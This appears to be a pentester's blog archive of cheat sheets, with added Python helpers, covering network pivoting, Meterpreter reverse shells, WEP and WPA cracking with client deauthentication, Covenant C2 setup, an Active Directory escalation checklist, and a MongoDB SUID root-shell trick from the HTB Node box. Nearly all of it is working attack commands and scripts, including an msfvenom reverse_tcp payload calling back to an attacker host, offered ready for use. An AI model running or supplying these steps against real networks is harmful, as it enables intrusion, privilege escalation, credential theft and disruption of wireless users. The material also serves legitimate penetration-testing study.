
Posts

Showing posts from October, 2020

Pivoting into an internal network behind firewall

    Accessing a victim network from a Windows box that is pivoted through Kali

    # On Kali: tunnel the 192.168.1.0/24 target range over SSH to 10.10.10.10 and listen on all
    # interfaces so other hosts can route through Kali. Kali must forward packets for this to work:
    # sysctl -w net.ipv4.ip_forward=1
    sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24

    # On Windows: note the current default gateway first, you need it to revert
    route print
    # delete the default route
    route delete 0.0.0.0
    # add a new default route with Kali as the gateway; KALI_IP is on the same subnet as the Windows box
    route add 0.0.0.0 mask 0.0.0.0 KALI_IP
    # Now everything reachable from Kali is reachable from the Windows box.

    # To revert the changes (here the original VMware gateway was 192.168.206.2):
    route delete 0.0.0.0
    route add 0.0.0.0 mask 0.0.0.0 VMWare_Gateway

    Get a Meterpreter on the target and add a route to the attacker machine
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.14.14.3 LPORT=4444 -f elf -o rev
    msfconsole
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set LHOST 10.14.14.3
    set LPORT 4444
    run
    background
    sessions            # list sessions and note the session id
    use post/multi/manage/autoroute
    set SUBNET 192.168.125.0
    set SESSION 4
    run
    use auxiliary/server/socks_proxy
    set SRVPORT 1060
    run
    Getting a
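The step most often botched in the Windows part of this procedure is deleting the default route without having recorded the original gateway, which leaves no way back. The following is an added example, not code from the original post: it parses the IPv4 table of a constructed `route print` sample, refuses to repoint the default route unless the Kali address is actually on-link for the Windows interface (otherwise the box loses all connectivity), and emits both the apply and the revert commands. The Kali address 192.168.206.128 and the sample table are assumptions for the example.

```python
"""Added example (not from the original post): record the Windows default
gateway before repointing it at Kali, and generate the route commands plus
their exact revert. The route table, KALI_IP 192.168.206.128 and the target
range below are constructed for the example."""
import ipaddress
import re

# Constructed sample of `route print` output from a VMware guest; the original
# gateway 192.168.206.2 is the one the post says must be restored afterwards.
ROUTE_PRINT = """\
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0    192.168.206.2   192.168.206.130     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
    192.168.206.0    255.255.255.0         On-link   192.168.206.130    281
===========================================================================
"""

# destination, netmask, gateway, interface, metric
ROW = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def parse_routes(text):
    """Return the rows of the IPv4 'Active Routes' table as dicts."""
    routes = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        dest, mask, gw, iface, metric = m.groups()
        try:
            ipaddress.ip_address(dest)  # skips the column-header row
        except ValueError:
            continue
        routes.append({"dest": dest, "mask": mask, "gateway": gw,
                       "interface": iface, "metric": int(metric)})
    return routes


def default_gateway(text):
    """Lowest-metric 0.0.0.0/0.0.0.0 route as (gateway, interface address)."""
    defaults = [r for r in parse_routes(text)
                if r["dest"] == "0.0.0.0" and r["mask"] == "0.0.0.0"]
    if not defaults:
        raise ValueError("no default route found")
    best = min(defaults, key=lambda r: r["metric"])
    return best["gateway"], best["interface"]


def pivot_commands(route_print_text, kali_ip):
    """Return (apply, revert) command lists for the Windows box.

    Refuses unless kali_ip is on-link via the interface that currently
    carries the default route, which is what the post requires."""
    orig_gw, iface = default_gateway(route_print_text)
    kali = ipaddress.ip_address(kali_ip)
    on_same_link = any(
        r["gateway"] == "On-link" and r["interface"] == iface
        and kali in ipaddress.ip_network(f'{r["dest"]}/{r["mask"]}', strict=False)
        for r in parse_routes(route_print_text))
    if not on_same_link:
        raise ValueError(f"{kali_ip} is not on-link via {iface}; the new default route would be unreachable")
    apply = ["route delete 0.0.0.0",
             f"route add 0.0.0.0 mask 0.0.0.0 {kali_ip}"]
    revert = ["route delete 0.0.0.0",
              f"route add 0.0.0.0 mask 0.0.0.0 {orig_gw}"]
    return apply, revert


def sshuttle_command(ssh_target, subnets, listen="0.0.0.0"):
    """Kali side: validate every subnet as CIDR before it reaches the shell."""
    nets = [str(ipaddress.ip_network(s, strict=False)) for s in subnets]
    return ["sshuttle", "--listen", listen, "-r", ssh_target, *nets]


if __name__ == "__main__":
    print(" ".join(sshuttle_command("user@10.10.10.10", ["192.168.1.0/24"])))
    apply, revert = pivot_commands(ROUTE_PRINT, "192.168.206.128")
    print("apply:", *apply, sep="\n  ")
    print("revert:", *revert, sep="\n  ")
```

Run it on the real `route print` output (pipe `route print` into a file and read it instead of `ROUTE_PRINT`) and keep the printed revert lines somewhere before touching the table.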

Wireless Pentesting

    Change your MAC address
    ifconfig wlan0 down
    macchanger -m aa:bb:cc:11:22:33 wlan0
    # or
    ifconfig wlan0 hw ether aa:bb:cc:11:22:33
    ifconfig wlan0 up

    Cracking WEP
    # Start monitor mode
    airmon-ng start wlan0
    # Search for wireless networks and copy the BSSID
    airodump-ng wlan0mon
    # Start capturing IV packets and do not close it
    airodump-ng --bssid 00:11:22:33:44:55 -c 1 wlan0mon -w PacketCapture
    # Crack the key once enough IVs are collected (airodump-ng appends -01 to the prefix)
    aircrack-ng PacketCapture-01.cap

    Cracking WPA/WPA2 PSK
    WPA/WPA2-PSK authenticates with a pre-shared key, so the 4-way handshake has to be captured while a client authenticates.
    service network-manager stop
    # Start monitor mode
    airmon-ng start wlan0
    # Search for wireless networks and copy the BSSID
    airodump-ng wlan0mon
    # Start capturing and do not close it; the handshake ends up in wpadump-01.cap
    airodump-ng --bssid 00:11:22:33:44:55 -c 1 wlan0mon -w wpadump
    # De-authenticate an already connected client (-c), or wait for someone to reconnect to the network
    aireplay-ng --deauth 50 -a router_MAC_Address -c Victim_MAC_Station wlan0mon
    #make su
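The BSSID and client MAC have to be copied by hand from the `airodump-ng` screen in the procedure above, and a typo there (a seven-octet MAC, for instance) silently produces an empty capture or a deauth aimed at nobody. The following added example, not code from the original post, reads the CSV that `airodump-ng -w prefix` writes beside the `.cap` file, picks the BSSID and channel for a chosen ESSID, lists the clients associated with it, and builds the capture and deauth commands only from validated MACs. The CSV contents, the ESSIDs and the interface name `wlan0mon` are constructed for the example.

```python
"""Added example (not from the original post): drive the airodump-ng /
aireplay-ng steps from airodump-ng's own CSV output instead of hand-copied
MACs. The CSV below is constructed in the shape airodump-ng writes."""
import csv
import io
import re

MAC_RE = re.compile(r"^[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}$")

# Constructed sample of prefix-01.csv: an AP section, a blank line, a station section.
AIRODUMP_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2020-10-01 12:00:00, 2020-10-01 12:05:00,  1,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, TestNet, 
66:77:88:99:AA:BB, 2020-10-01 12:00:00, 2020-10-01 12:05:00,  6,  54, WEP, WEP, , -60,  80,  4200,   0.  0.  0.  0,   6, OldNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2020-10-01 12:01:00, 2020-10-01 12:05:00, -50,  30, 00:11:22:33:44:55, TestNet
11:22:33:44:55:66, 2020-10-01 12:02:00, 2020-10-01 12:05:00, -70,  5, (not associated), 
"""


def is_valid_mac(mac):
    """Six colon-separated hex octets; catches the seven-octet typo in the notes above."""
    return bool(MAC_RE.match(mac))


def parse_airodump_csv(text):
    """Return (access_points, stations) from an airodump-ng CSV dump."""
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or all(not c.strip() for c in row):
            continue
        head = row[0].strip()
        if head == "BSSID":
            section = "ap"
            continue
        if head == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps.append({"bssid": row[0].strip().lower(), "channel": int(row[3].strip()),
                        "privacy": row[5].strip(), "essid": row[13].strip()})
        elif section == "sta" and len(row) >= 6:
            # unassociated clients carry "(not associated)" instead of a BSSID
            bssid = row[5].strip().lower()
            if is_valid_mac(bssid):
                stations.append({"station": row[0].strip().lower(), "bssid": bssid})
    return aps, stations


def pick_target(aps, essid):
    """The AP advertising the requested ESSID (first match)."""
    for ap in aps:
        if ap["essid"] == essid:
            return ap
    raise LookupError(f"no AP named {essid!r} in the capture")


def clients_of(stations, bssid):
    """Client MACs associated with bssid, the candidates for a deauth."""
    return sorted(s["station"] for s in stations if s["bssid"] == bssid.lower())


def capture_command(bssid, channel, prefix, iface="wlan0mon"):
    if not is_valid_mac(bssid):
        raise ValueError(f"bad BSSID {bssid!r}")
    return ["airodump-ng", "--bssid", bssid, "-c", str(channel), "-w", prefix, iface]


def deauth_command(bssid, station, count=50, iface="wlan0mon"):
    if not (is_valid_mac(bssid) and is_valid_mac(station)):
        raise ValueError("bad MAC address")
    return ["aireplay-ng", "--deauth", str(count), "-a", bssid, "-c", station, iface]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(AIRODUMP_CSV)
    ap = pick_target(aps, "TestNet")
    print(" ".join(capture_command(ap["bssid"], ap["channel"], "wpadump")))
    for client in clients_of(stations, ap["bssid"]):
        print(" ".join(deauth_command(ap["bssid"], client)))
```

Point `parse_airodump_csv` at the real `wpadump-01.csv` written by the survey run; the deauth step then targets a client that is demonstrably associated, which is what produces the handshake.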

Covenant C2

    Installing Covenant C2
    git clone --recurse-submodules https://github.com/cobbr/Covenant.git
    wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
    sudo dpkg -i packages-microsoft-prod.deb
    sudo apt-get update
    sudo apt-get install apt-transport-https
    sudo apt-get update
    sudo apt-get install dotnet-sdk-3.1
    cd Covenant/Covenant
    dotnet build

    Start Covenant C2
    cd Covenant/Covenant
    sudo dotnet run
    Browse to https://127.0.0.1:7443/
    Create a listener first.
    Create a launcher and select the type of launcher.
    Select the parameters.
    Move to the Hosts tab, give your reverse shell a name and copy the command.
    After you get a shell, a Grunt will appear in your Grunts section. Open the Grunt and go to the Interact tab to interact with the target.

    Commands:
    SharpUp audit - runs privilege escalation checks to find vulnerabilities
    ShellCmd - runs cmd commands, e.g. ShellCmd dir c:\users\
    PowerShellImport - uploads a PowerShell script
    To run

AD PenTest - Recon and Initial Access

Use PowerSploit/PrivEsc/PowerUp.ps1 to find potential privilege escalation info. Check for non-Windows processes and their listening ports using netstat.
Step 1: Check net user, the local admins and user rights.
Step 2: Check whether PowerShell is available; if yes, run PowerUp.ps1, Sherlock.ps1 and JAWS.ps1.
Step 3: Try to get a Meterpreter session.
Step 4: Load mimikatz, try to bypass UAC, check the SAM and SYSTEM hives, etc.
Step 5: Check for unusual programs and registry entries.
Step 6: If the box is a Domain Controller - enumerate SMB users and LDAP users, run BloodHound (GUI AD enumeration) and Kerberos enumeration, then brute force. Attacking AD with LDAP and Kerberos.
Step 7: Got creds - try psexec.py or crackmapexec (cheatsheet).

Mongo DB Commands

    Here are some basic MongoDB shell commands
    # List databases
    show dbs
    # Select a DB
    use database_name
    # List collections (a collection is the counterpart of an SQL table; its documents are the rows)
    show collections
    # List the documents in a collection
    db.collection_name.find();
    db.users.find();
    db.users.find().forEach(printjson)

    Exploiting MongoDB - HTB Node
    Find the credentials in app.js, for example:
    mongodb://username:password@localhost:port/.......=DEFAULT&authSource=databasename';
    # -p without a value prompts for the password instead of leaving it in the process list
    mongo -p -u username DBName
    // Create a SUID shell: a root job executes the cmd field of documents in this collection
    db.TableName.insert({"cmd" : "cp /bin/dash /tmp/filename; chmod 6755 /tmp/filename"})
    db.TableName.find()
    // run it keeping the root effective uid
    /tmp/filename -p
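Pulling the connection string out of app.js and reading it correctly is the step that decides whether the `mongo` login works: the password may be percent-encoded, and the database in the path is not necessarily the one to authenticate against (`authSource`). The following added example, not code from the original post or from HTB, scans a constructed app.js snippet for `mongodb://` URIs, parses each into its components, and assembles the login command in the same `-p -u` order as above so the password is prompted rather than passed on the command line. The user `dbuser`, the password `S3cret%40pass`, the host and the database names are assumptions for the example; real app.js files may use a multi-host URI, which this single-host parser does not handle.

```python
"""Added example (not from the original post): find MongoDB connection
strings in application source and turn them into a login command. The
app.js text, credentials and database names are constructed for the example."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed snippet in the shape of an app.js connection line.
APP_JS = """
const mongoose = require('mongoose');
const url = 'mongodb://dbuser:S3cret%40pass@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
mongoose.connect(url);
"""

URI_RE = re.compile(r"mongodb(?:\+srv)?://[^\s'\"`]+")


def find_mongo_uris(text):
    """Every mongodb:// or mongodb+srv:// URI literal in the source text."""
    return URI_RE.findall(text)


def parse_mongo_uri(uri):
    """Split a single-host MongoDB URI into its login-relevant parts.

    The password is percent-decoded (the URI form of '@' is %40); the auth
    database defaults to the path database when authSource is absent."""
    parts = urlsplit(uri)
    if not parts.hostname:
        raise ValueError(f"unsupported or multi-host URI: {uri!r}")
    database = parts.path.lstrip("/") or "admin"
    query = parse_qs(parts.query)
    return {
        "user": unquote(parts.username) if parts.username else None,
        "password": unquote(parts.password) if parts.password else None,
        "host": parts.hostname,
        "port": parts.port or 27017,
        "database": database,
        "auth_source": query.get("authSource", [database])[0],
    }


def mongo_login_command(creds):
    """argv for the legacy mongo shell; -p with no value prompts for the password."""
    cmd = ["mongo", "--host", creds["host"], "--port", str(creds["port"])]
    if creds["user"]:
        cmd += ["-p", "-u", creds["user"], "--authenticationDatabase", creds["auth_source"]]
    cmd.append(creds["database"])
    return cmd


if __name__ == "__main__":
    for uri in find_mongo_uris(APP_JS):
        creds = parse_mongo_uri(uri)
        print(f"user={creds['user']} password={creds['password']} "
              f"authSource={creds['auth_source']} db={creds['database']}")
        print(" ".join(mongo_login_command(creds)))
```

Run it as `python3 script.py` after replacing `APP_JS` with the contents of the real app.js; the decoded password is what you type at the `mongo` prompt.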